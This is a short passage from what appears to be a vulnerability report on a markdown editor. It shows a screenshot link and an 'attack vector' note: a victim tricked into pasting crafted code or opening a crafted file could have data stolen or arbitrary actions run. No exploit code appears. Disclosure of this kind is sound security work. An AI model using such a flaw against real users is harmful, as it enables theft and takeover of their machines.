code execution” will pop up:  
![image](https://user-images.githubusercontent.com/19193738/40174856-fcbca0ec-59de-11e8-9f3d-64595f47f479.png)

**Attack vector**: If the victim is forced or tricked into pasting such code or open a crafted file in the markdown editor, it is possible for the attacker to steal user’s data from the computer or perform any actions on the machine on which the application running on.

Tag

#ubuntu